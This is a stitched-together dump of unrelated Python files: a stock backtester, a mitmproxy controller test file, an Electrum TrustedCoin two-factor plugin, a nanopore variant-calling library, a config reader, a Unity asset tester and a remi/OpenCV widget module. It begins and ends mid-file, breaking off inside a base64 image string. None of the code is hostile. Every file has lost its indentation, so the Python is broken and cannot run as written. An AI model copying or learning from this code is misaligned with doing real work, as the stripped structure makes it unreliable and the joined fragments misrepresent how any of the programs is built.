procs = []
workcount = int(last / int(sys.argv[47])) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackTester1Stock, args=(q, code_list, num, df3, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num[i][0]
print(f' 최고수익률 갱신 {htsp}%')
if num[i][0] == num[i][1]:
num[i][0] = high_var
if num[i][2] != num[i][3]:
if num[i][0] != ogin_var:
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
elif i < len(num) - 1:
i += 1
ogin_var = num[i][0]
high_var = num[i][0]
if i == 6:
if num[i][0] != int(sys.argv[15]):
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
else:
break
num[i][0] = round(num[i][0] + num[i][2], 1)
w = Process(target=Total, args=(q, last, num, df1))
w.start()
procs = []
workcount = int(last / int(sys.argv[47])) + 1
for j in range(0, last, workcount):
db_list = table_list[j:j + workcount]
p = Process(target=BackTester1Stock, args=(q, db_list, num, df3, True))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
print(f" 백테스팅 소요시간 {end - start}")
|
test_controller.py
|
from threading import Thread, Event
from mock import Mock
from mitmproxy import controller
from six.moves import queue
from mitmproxy.exceptions import Kill
from mitmproxy.proxy import DummyServer
from netlib.tutils import raises
class TMsg:
pass
class TestMaster(object):
def test_simple(self):
class DummyMaster(controller.Master):
@controller.handler
def log(self, _):
m.should_exit.set()
def tick(self, timeout):
# Speed up test
super(DummyMaster, self).tick(0)
m = DummyMaster()
assert not m.should_exit.is_set()
msg = TMsg()
msg.reply = controller.DummyReply()
m.event_queue.put(("log", msg))
m.run()
assert m.should_exit.is_set()
def test_server_simple(self):
m = controller.Master()
s = DummyServer(None)
m.add_server(s)
m.start()
m.shutdown()
m.start()
m.shutdown()
class TestServerThread(object):
def test_simple(self):
m = Mock()
t = controller.ServerThread(m)
t.run()
assert m.serve_forever.called
class TestChannel(object):
def test_tell(self):
q = queue.Queue()
channel = controller.Channel(q, Event())
m = Mock()
channel.tell("test", m)
assert q.get() == ("test", m)
assert m.reply
def test_ask_simple(self):
q = queue.Queue()
def reply():
m, obj = q.get()
assert m == "test"
obj.reply.send(42)
Thread(target=reply).start()
channel = controller.Channel(q, Event())
assert channel.ask("test", Mock()) == 42
def test_ask_shutdown(self):
q = queue.Queue()
done = Event()
done.set()
channel = controller.Channel(q, done)
with raises(Kill):
channel.ask("test", Mock())
class TestDummyReply(object):
def test_simple(self):
reply = controller.DummyReply()
assert not reply.acked
reply.ack()
assert reply.acked
class TestReply(object):
def test_simple(self):
reply = controller.Reply(42)
assert not reply.acked
reply.send("foo")
assert reply.acked
assert reply.q.get() == "foo"
def test_default(self):
reply = controller.Reply(42)
reply.ack()
assert reply.q.get() == 42
def test_reply_none(self):
reply = controller.Reply(42)
reply.send(None)
assert reply.q.get() is None
|
qt.py
|
#!/usr/bin/env python3
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from functools import partial
from threading import Thread
import re
from decimal import Decimal
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from electrumpq_gui.qt.util import *
from electrumpq_gui.qt.qrcodewidget import QRCodeWidget
from electrumpq_gui.qt.amountedit import AmountEdit
from electrumpq_gui.qt.main_window import StatusBarButton
from electrumpq.i18n import _
from electrumpq.plugins import hook
from .trustedcoin import TrustedCoinPlugin, server
class TOS(QTextEdit):
tos_signal = pyqtSignal()
error_signal = pyqtSignal(object)
class Plugin(TrustedCoinPlugin):
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
@hook
def on_new_window(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(QIcon(":icons/trustedcoin-status.png"),
_("TrustedCoin"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
pw = AmountEdit(None, is_int = True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _('If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
@hook
def sign_tx(self, window, tx):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if not wallet.can_sign_without_server():
self.print_error("twofactor:sign_tx")
auth_code = None
if wallet.keystores['x3/'].get_tx_derivations(tx):
auth_code = self.auth_dialog(window)
else:
self.print_error("twofactor: xpub3 not needed")
window.wallet.auth_code = auth_code
def waiting_dialog(self, window, on_finished=None):
task = partial(self.request_billing_info, window.wallet)
return WaitingDialog(window, 'Getting billing information...', task,
on_finished)
@hook
def abort_send(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
return True
return False
def settings_dialog(self, window):
self.waiting_dialog(window, partial(self.show_settings_dialog, window))
def show_settings_dialog(self, window, success):
if not success:
window.show_message(_('Server not reachable.'))
return
wallet = window.wallet
d = WindowModalDialog(window, _("TrustedCoin Information"))
d.setMinimumSize(500, 200)
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(":icons/trustedcoin-status.png"))
msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>'\
+ _("For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
label = QLabel(msg)
label.setOpenExternalLinks(1)
hbox.addStretch(10)
hbox.addWidget(logo)
hbox.addStretch(10)
hbox.addWidget(label)
hbox.addStretch(10)
vbox.addLayout(hbox)
vbox.addStretch(10)
msg = _('TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addStretch(10)
grid = QGridLayout()
vbox.addLayout(grid)
price_per_tx = wallet.price_per_tx
n_prepay = wallet.num_prepay(self.config)
i = 0
for k, v in sorted(price_per_tx.items()):
if k == 1:
continue
grid.addWidget(QLabel("Pay every %d transactions:"%k), i, 0)
grid.addWidget(QLabel(window.format_amount(v/k) + ' ' + window.base_unit() + "/tx"), i, 1)
b = QRadioButton()
b.setChecked(k == n_prepay)
b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
grid.addWidget(b, i, 2)
i += 1
n = wallet.billing_info.get('tx_remaining', 0)
grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def on_buy(self, window, k, v, d):
d.close()
if window.pluginsdialog:
window.pluginsdialog.close()
wallet = window.wallet
uri = "bpq:" + wallet.billing_info['billing_address'] + "?message=TrustedCoin %d Prepaid Transactions&amount="%k + str(Decimal(v)/100000000)
wallet.is_billing = True
window.pay_to_URI(uri)
window.payto_e.setFrozen(True)
window.message_e.setFrozen(True)
window.amount_e.setFrozen(True)
def accept_terms_of_use(self, window):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Terms of Service")))
tos_e = TOS()
tos_e.setReadOnly(True)
vbox.addWidget(tos_e)
tos_received = False
vbox.addWidget(QLabel(_("Please enter your e-mail address")))
email_e = QLineEdit()
vbox.addWidget(email_e)
next_button = window.next_button
prior_button_text = next_button.text()
next_button.setText(_('Accept'))
def request_TOS():
try:
tos = server.get_terms_of_service()
except Exception as e:
import traceback
traceback.print_exc(file=sys.stderr)
tos_e.error_signal.emit(_('Could not retrieve Terms of Service:')
+ '\n' + str(e))
return
self.TOS = tos
tos_e.tos_signal.emit()
def on_result():
tos_e.setText(self.TOS)
nonlocal tos_received
tos_received = True
set_enabled()
def on_error(msg):
window.show_error(str(msg))
window.terminate()
def set_enabled():
valid_email = re.match(regexp, email_e.text()) is not None
next_button.setEnabled(tos_received and valid_email)
tos_e.tos_signal.connect(on_result)
tos_e.error_signal.connect(on_error)
t = Thread(target=request_TOS)
t.setDaemon(True)
t.start()
regexp = r"[^@]+@[^@]+\.[^@]+"
email_e.textChanged.connect(set_enabled)
email_e.setFocus(True)
window.exec_layout(vbox, next_enabled=False)
next_button.setText(prior_button_text)
return str(email_e.text())
def request_otp_dialog(self, window, _id, otp_secret):
vbox = QVBoxLayout()
if otp_secret is not None:
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
l = QLabel("Please scan the following QR code in Google Authenticator. You may as well use the following key: %s"%otp_secret)
l.setWordWrap(True)
vbox.addWidget(l)
qrw = QRCodeWidget(uri)
vbox.addWidget(qrw, 1)
msg = _('Then, enter your Google Authenticator code:')
else:
label = QLabel(
"This wallet is already registered with TrustedCoin. "
"To finalize wallet creation, please enter your Google Authenticator Code. "
)
label.setWordWrap(1)
vbox.addWidget(label)
msg = _('Google Authenticator code:')
hbox = QHBoxLayout()
hbox.addWidget(WWLabel(msg))
pw = AmountEdit(None, is_int = True)
pw.setFocus(True)
pw.setMaximumWidth(50)
hbox.addWidget(pw)
vbox.addLayout(hbox)
cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
vbox.addWidget(cb_lost)
cb_lost.setVisible(otp_secret is None)
def set_enabled():
b = True if cb_lost.isChecked() else len(pw.text()) == 6
window.next_button.setEnabled(b)
pw.textChanged.connect(set_enabled)
cb_lost.toggled.connect(set_enabled)
window.exec_layout(vbox, next_enabled=False,
raise_on_cancel=False)
return pw.get_amount(), cb_lost.isChecked()
|
variantCallingLib.py
|
#!/usr/bin/env python
"""Library for calling variants
"""
import sys
import os
import glob
import pandas as pd
import numpy as np
from random import shuffle
from .signalAlignLib import SignalAlignment
from .alignmentAnalysisLib import CallMethylation
from multiprocessing import Process, Queue, current_process, Manager
from signalalign.utils.parsers import read_fasta
from signalalign.utils.sequenceTools import reverse_complement
def randomly_select_alignments(path_to_alignments, max_alignments_to_use):
alignments = [x for x in glob.glob(path_to_alignments) if os.stat(x).st_size != 0]
if len(alignments) == 0:
print(("[error] Didn't find any alignment files here {}".format(path_to_alignments)))
sys.exit(1)
shuffle(alignments)
if len(alignments) < max_alignments_to_use:
return alignments
else:
return alignments[:max_alignments_to_use]
def get_forward_mask(list_of_alignments, suffix):
mask = []
for alignment in list_of_alignments:
if alignment.endswith(".backward.tsv{}".format(suffix)):
mask.append(False)
else:
mask.append(True)
return mask
def get_alignments_labels_and_mask(path_to_alignments, max, suffix=""):
alignments = randomly_select_alignments(path_to_alignments, max)
mask = get_forward_mask(alignments, suffix)
return alignments, mask
def get_reference_sequence(path_to_fasta):
seqs = []
for header, comment, sequence in read_fasta(path_to_fasta):
seqs.append(sequence)
assert len(seqs) > 0, "Didn't find any sequences in the reference file"
if len(seqs) > 1:
print("[NOTICE] Found more than one sequence in the reference file, using the first one")
return seqs[0]
def make_degenerate_reference(input_sequence, positions, forward_sequence_path, backward_sequence_path,
block_size=1):
"""
input_sequence: string, input nucleotide sequence
out_path: string, path to directory to put new sequences with substituted degenerate characters
block_size: not implemented, will be the size of the Ns to add (eg. NN = block_size 2)
:return (subbed sequence, complement subbed sequence)
"""
complement_sequence = reverse_complement(dna=input_sequence, reverse=False, complement=True)
if positions is not None:
t_seq = list(input_sequence)
c_seq = list(complement_sequence)
for position in positions:
t_seq[position] = "X"
c_seq[position] = "X"
t_seq = ''.join(t_seq)
c_seq = ''.join(c_seq)
else:
t_seq = input_sequence
c_seq = complement_sequence
with open(forward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=t_seq))
with open(backward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=c_seq))
return True
def load_variant_call_data(file_path):
data = pd.read_table(file_path,
usecols=(0, 1, 2, 3, 4, 5, 6),
names=['site', 'strand', 'pA', 'pC', 'pG', 'pT', 'read'],
dtype={'site': np.int64,
'strand': np.str,
'pC': np.float64,
'pmC': np.float64,
'phmC': np.float64,
'read': np.str,
})
return data
def symbol_to_base(symbol):
return ["A", "C", "G", "T"][symbol]
def rc_probs(probs):
return [probs[3], probs[2], probs[1], probs[0]]
def call_sites_with_marginal_probs(data, reference_sequence_string, min_depth=0, get_sites=False):
d = load_variant_call_data(data)
reference_sequence_list = list(reference_sequence_string)
candidate_sites = []
add_to_candidates = candidate_sites.append
for g, x in d.groupby("site"):
marginal_forward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
marginal_backward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
assert(len(x['site'].unique()) == 1)
site = x['site'].unique()[0]
if len(x['read']) < min_depth:
continue
for i, read in x.iterrows():
if ((read['read'].endswith(".forward.tsv") and read['strand'] == 't') or
(read['read'].endswith(".backward.tsv") and read['strand'] == 'c')):
direction = True
else:
direction = False
if direction:
marginal_forward_p += read[['pA', 'pC', 'pG', 'pT']]
else:
marginal_backward_p += read[['pA', 'pC', 'pG', 'pT']]
marginal_prob = marginal_forward_p + rc_probs(marginal_backward_p)
normed_marginal_probs = marginal_prob.map(lambda y: y / sum(marginal_prob))
called_base = normed_marginal_probs.argmax()[1]
if called_base != reference_sequence_list[site]:
if get_sites is False:
print(("Changing {orig} to {new} at {site} depth {depth}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site, depth=len(x['read']))))
reference_sequence_list[site] = called_base
else:
print(("Proposing edit at {site} from {orig} to {new}, \n{probs}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site,
probs=normed_marginal_probs)))
difference = normed_marginal_probs.max() - normed_marginal_probs["p" + reference_sequence_list[site]]
print(difference)
add_to_candidates((site, difference))
if get_sites is True:
return candidate_sites
else:
return ''.join(reference_sequence_list)
def aligner(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
alignment = SignalAlignment(**f)
alignment.run()
except Exception as e:
done_queue.put("%s failed with %s" % (current_process().name, e.message))
def variant_caller(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
c = CallMethylation(**f)
c.write()
except Exception as e:
done_queue.put("%s failed with %s" % (current_process().name, e.message))
def run_service(service, service_iterable, service_arguments, workers, iterable_argument):
# setup workers for multiprocessing
work_queue = Manager().Queue()
done_queue = Manager().Queue()
jobs = []
for x in service_iterable:
args = dict({iterable_argument: x},
**service_arguments)
work_queue.put(args)
for w in range(workers):
p = Process(target=service, args=(work_queue, done_queue))
p.start()
jobs.append(p)
work_queue.put('STOP')
for p in jobs:
p.join()
done_queue.put('STOP')
def make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=None):
# make paths for working txt files that contain this STEPs Ns
forward_reference = working_folder.add_file_path("forward_reference.txt")
backward_reference = working_folder.add_file_path("backward_reference.txt")
# make N-ed reference sequence for this iteration, writes the strings to files
check = make_degenerate_reference(reference_sequence_string, n_positions,
forward_reference, backward_reference)
assert check, "Problem making degenerate reference"
# perform alignment for this step
alignment_args["forward_reference"] = forward_reference
alignment_args["backward_reference"] = backward_reference
return True
def scan_for_proposals(working_folder, step, reference_sequence_string, list_of_fast5s, alignment_args, workers):
reference_sequence_length = len(reference_sequence_string)
assert reference_sequence_length > 0, "Got empty string for reference sequence."
# proposals will contain the sites that we're going to change to N
proposals = []
for s in range(step):
scan_positions = list(range(s, reference_sequence_length, step))
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string,
alignment_args, n_positions=scan_positions)
assert check, "Problem making degenerate reference for step {step}".format(step=s)
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
# alignments is the list of alignments to gather proposals from
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
if len(alignments) == 0:
print(("[error] Didn't find any alignment files here {}".format(working_folder.path)))
sys.exit(1)
marginal_probability_file = working_folder.add_file_path("marginals.{step}.calls".format(step=s))
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": scan_positions, "backward": scan_positions},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
# get proposal sites
proposals += call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
min_depth=0, get_sites=True)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
# proposals is a list of lists containing (position, delta_prob) where position in the position in the
# reference sequence that is being proposed to be edited, and delta_prob is the difference in probability
# of the reference base to the proposed base
return proposals
def update_reference_with_marginal_probs(working_folder, proposals, reference_sequence_string, list_of_fast5s,
alignment_args, workers):
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=proposals)
assert check, "[update_reference_with_marginal_probs]: problem making reference files and args dict"
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
marginal_probability_file = working_folder.add_file_path("proposals.calls")
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": proposals, "backward": proposals},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
# get proposal sites
updated_reference_sequence = call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
min_depth=0, get_sites=True)
# clean up
working_folder.remove_file(marginal_probability_file)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
return updated_reference_sequence
|
config_reader.py
|
import copy
import multiprocessing as mp
def process_configs(target, arg_parser, train_path=None, valid_path=None, log_path = None, save_path=None, seed=None):
args, _ = arg_parser.parse_known_args()
ctx = mp.get_context('spawn')
for run_args, _run_config, _run_repeat in _yield_configs(arg_parser, args):
if train_path is None:
p = ctx.Process(target=target, args=(run_args,))
else:
p = ctx.Process(target=target, args=(run_args,train_path,valid_path,log_path,save_path,seed))
p.start()
p.join()
def _read_config(path):
lines = open(path).readlines()
runs = []
run = [1, dict()]
for line in lines:
stripped_line = line.strip()
# continue in case of comment
if stripped_line.startswith('#'):
continue
if not stripped_line:
if run[1]:
runs.append(run)
run = [1, dict()]
continue
if stripped_line.startswith('[') and stripped_line.endswith(']'):
repeat = int(stripped_line[1:-1])
run[0] = repeat
else:
key, value = stripped_line.split('=')
key, value = (key.strip(), value.strip())
run[1][key] = value
if run[1]:
runs.append(run)
return runs
def _convert_config(config):
config_list = []
for k, v in config.items():
if v.lower() == 'true':
config_list.append('--' + k)
elif v.lower() != 'false':
config_list.extend(['--' + k] + v.split(' '))
return config_list
def _yield_configs(arg_parser, args, verbose=True):
_print = (lambda x: print(x)) if verbose else lambda x: x
if args.config:
config = _read_config(args.config)
for run_repeat, run_config in config:
print("-" * 50)
print("Config:")
print(run_config)
args_copy = copy.deepcopy(args)
config_list = _convert_config(run_config)
run_args = arg_parser.parse_args(config_list, namespace=args_copy)
run_args_dict = vars(run_args)
# set boolean values
for k, v in run_config.items():
if v.lower() == 'false':
run_args_dict[k] = False
print("Repeat %s times" % run_repeat)
print("-" * 50)
for iteration in range(run_repeat):
_print("Iteration %s" % iteration)
_print("-" * 50)
yield run_args, run_config, run_repeat
else:
yield args, None, None
def _calibrate_yield_configs(arg_parser, args, verbose=False):
if args.config:
config = _read_config(args.config)
for run_repeat, run_config in config:
args_copy = copy.deepcopy(args)
config_list = _convert_config(run_config)
run_args = arg_parser.parse_args(config_list, namespace=args_copy)
run_args_dict = vars(run_args)
# set boolean values
for k, v in run_config.items():
if v.lower() == 'false':
run_args_dict[k] = False
for iteration in range(run_repeat):
yield run_args, run_config, run_repeat
else:
yield args, None, None
def _api_yield_configs(arg_parser, args, verbose=False):
if args.config:
config = _read_config(args.config)
for run_repeat, run_config in config:
args_copy = copy.deepcopy(args)
config_list = _convert_config(run_config)
run_args = arg_parser.parse_args(config_list, namespace=args_copy)
run_args_dict = vars(run_args)
# set boolean values
for k, v in run_config.items():
if v.lower() == 'false':
run_args_dict[k] = False
for iteration in range(run_repeat):
yield run_args, run_config, run_repeat
else:
yield args, None, None
|
commands.py
|
import re
from argparse import ArgumentParser
from multiprocessing import Pool, Manager, Process
from pathlib import Path
from .utils import UnityDocument
YAML_HEADER = '%YAML'
class UnityProjectTester:
"""
Class to run tests on a given Unity project folder
"""
AVAILABLE_COMMANDS = ('test_no_yaml_is_modified',)
def __init__(self):
self.options = None
def run(self):
top_parser = ArgumentParser()
subparser = top_parser.add_subparsers()
subparser.required = True
for cmd in UnityProjectTester.AVAILABLE_COMMANDS:
fn = getattr(self, cmd)
parser = subparser.add_parser(cmd, help=fn.__doc__)
parser.set_defaults(func=fn)
top_parser.add_argument('project_path', help='Path to the Unity project folder')
top_parser.add_argument('--exclude',
help='Exclude regexp when searching project files. Can be specified multiple times.',
default=None,
action='append')
top_parser.add_argument('--keep-changes',
help='If a file changes after serialization, do not revert the changes.',
default=False,
action='store_true')
top_parser.add_argument('--dry-run',
help='Dont\'t modify.',
default=False,
action='store_true')
try:
self.options = top_parser.parse_args()
except TypeError:
top_parser.print_help()
return 2
# run given function
self.options.func()
def test_no_yaml_is_modified(self):
"""
Recurse the whole project folder looking for '.asset' files, load and save them all, and check that
there are no modifications
"""
if self.options.dry_run:
print("Dry-run mode enabled: YAMLs won't be dumped.")
if self.options.keep_changes:
print("Keep changes mode will not have any effect during dry run.")
elif self.options.keep_changes:
print("Keep changes mode enabled: Changes to files will be kept.")
project_path = Path(self.options.project_path)
asset_file_paths = [p for p in project_path.rglob('*.asset')]
print("Found {} '.asset' files".format(len(asset_file_paths)))
def is_path_included(path):
# compare regexp against absolute path
return not any(rexp.search(str(path.resolve())) for rexp in rexps)
if self.options.exclude is not None:
rexps = [re.compile(rexp) for rexp in self.options.exclude]
valid_file_paths = [p for p in filter(is_path_included, asset_file_paths)]
print("Excluded {} '.asset' files".format(len(asset_file_paths) - len(valid_file_paths)))
else:
valid_file_paths = asset_file_paths
file_results = []
with Manager() as manager:
print_queue = manager.Queue()
diff_list = manager.list()
queue_process = Process(target=UnityProjectTester.read_output, args=(print_queue,))
queue_process.start()
with Pool() as pool:
for f in valid_file_paths:
async_res = pool.apply_async(UnityProjectTester.open_and_save,
(f, print_queue, diff_list, self.options.keep_changes,
self.options.dry_run))
file_results.append((f, async_res))
pool.close()
pool.join()
# signal end of queue with None token
print_queue.put(None)
queue_process.join()
error_results = list(filter(lambda r: not r[1].successful(), file_results))
if len(error_results):
# raise the first exception
file_path, result = error_results[0]
print("Python process evaluating file {} failed with the following exception:".format(
file_path.resolve()), flush=True)
result.get()
if len(diff_list):
print("{} files are different now:".format(len(diff_list)))
print('\n'.join([str(f.resolve()) for f in diff_list]))
@staticmethod
def read_output(print_queue):
msg = print_queue.get()
while msg is not None:
print(msg, flush=True)
msg = print_queue.get()
@staticmethod
def open_and_save(asset_file_path, print_queue, diff_list, keep_changes=False, dry_run=False):
# check YAML version header, save original content
with open(str(asset_file_path), 'rb') as fp:
header = fp.read(len(YAML_HEADER))
try:
is_yaml_file = header.decode('utf-8') == YAML_HEADER
except UnicodeDecodeError:
is_yaml_file = False
finally:
if not is_yaml_file:
print_queue.put("Ignoring non-yaml file {}".format(asset_file_path))
return
else:
fp.seek(0)
print_queue.put("Processing {}".format(asset_file_path))
a_file_content = fp.read()
doc = UnityDocument.load_yaml(str(asset_file_path))
if dry_run:
return
try:
doc.dump_yaml()
with open(str(asset_file_path), 'rb') as fp:
b_file_content = fp.read()
# compare
if a_file_content != b_file_content:
diff_list.append(asset_file_path)
if not keep_changes:
with open(str(asset_file_path), 'wb') as fp:
fp.write(a_file_content)
except Exception:
with open(str(asset_file_path), 'wb') as fp:
fp.write(a_file_content)
raise
if __name__ == '__main__':
# None is considered successful
code = UnityProjectTester().run() or 0
exit(code)
|
toolbox_opencv.py
|
# -*- coding: utf-8 -*-
import remi
import remi.gui as gui
import cv2
from threading import Timer, Thread
import traceback
import time
def default_icon(name, view_w=1, view_h=0.6):
icon = gui.Svg(50,30)
icon.set_viewbox(-view_w/2,-view_h/2,view_w,view_h)
text = gui.SvgText(0,0,name)
text.style['font-size'] = "0.2px"
text.style['text-anchor'] = "middle"
stroke_width = 0.01
rect = gui.SvgRectangle(-view_w/2+stroke_width,-view_h/2+stroke_width,view_w-stroke_width*2,view_h-stroke_width*2)
rect.set_fill("none")
rect.set_stroke(0.01,'black')
icon.append([rect, text])
return icon
# noinspection PyUnresolvedReferences
class OpencvWidget(object):
def _setup(self):
#this must be called after the Widget super constructor
self.on_new_image.do = self.do
def do(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image.event_method_bound, '_js_code'):
self.on_new_image.event_source_instance.attributes[self.on_new_image.event_name] = self.on_new_image.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image.event_source_instance.identifier, 'event_name':self.on_new_image.event_name}
self.on_new_image.callback = callback
self.on_new_image.userdata = userdata
self.on_new_image.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible link to the plc
if callback is not None: #protection against the callback replacements in the editor
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image(self):
return ()
class OpencvImRead(gui.Image, OpencvWidget):
""" OpencvImRead widget.
Allows to read an image from file.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAAuCAYAAAB04nriAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAFnQAABZ0B24EKIgAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAATOSURBVGiB5ZpdbBRVFMd/d6ZlpVCKQEF48jtEQkyMiRFNjEZe9AHUxMQHg/HBQOKjJD7ogxojwcYHIKAEP7AaYpQPQb6hQqpdqgIWRIpbChWU7W63y3a7O9vdmbk+lG637LYz087druH3tLn33HPOf+fOvWfujFi+eK7kFkKb7ATKTdXQD6HpBObcMZm5KGOgJ4y0LaBAcPWseh5cu33SklLJ6TeWk+0JA7fylHbDNHqYJ/9AExbdLCLJ/+8WcCW4GoPHWM8jcjMCG26s6+08w0HxHga3q8zRV1wIljwvV3IXzUU9C9lHnfyHRvEdNrqC9PzH8R5exO6SYoeYTxsP8aWvSanEUfBYYvM20tmmUnAUPFN2OTqZxWU/cikLjoJj3OvoJMr9viRTDhwFh8RSRych8bQvyTjRYfxES2IrphwYtw/HVbqDpzjHMhbxfcn+Tp7gLC+MOwE35KTBt92raU83kZMZ2vr38OqCrQTENM++XFVae0UDx8VqckzNt5kECLKK7eITQHgO7JaEFebTf1/mbGofOZkB4O/MKXZF3x6XP1eFh41OkFW0iteYQwgNkwgLsb0Vap7pTJ9gT+wdwtkLRX3t6aNcTLdwT80STz49ZWyjE2GhpwDjIScNjvau42RyB/1WtKRNxkrSFF/P3TWPIjzMMLWXyCWmzBLLdRHJdtBpBOnMBIlkLzqO6xo4STCxlSV1r7iO5UmwQQJDJAjI6UylDm2C5eSp5E5+T+4ikguRNHuwMT2Nt6RJa982Hq59kSlajasxjoLDop1mfQtXtTOkiGOKDDrV3CZrmSHnMVveyX3ycRZbz7r+A+LmVXZF36LTaJ3QFgMQyYbYH1vDsvp3XdmPKbhJ30Cr/hV9IlLUlxbX6RVXuMxvnGYnx/RNPGAv5UnzdaqYMqrP86kj7I+tJZrrcJWgG86lDrJk5grqq+9xtB11WzpY9SHHqjaWFHszNhZhcYEmfQMbpzxHi/5FSbtfEtvYHn3TV7EASSvK/tgaV7YlBbfpuzmhfU2OjOfg18R59la9z2fVK0gTz7cHE40cijeQsno9+3TDxXQLZ1P7HO2KBA+IFEf19WRE37iD21iEtGY2V7/EJa2V4/GPORxvIGXFnQePk6w0a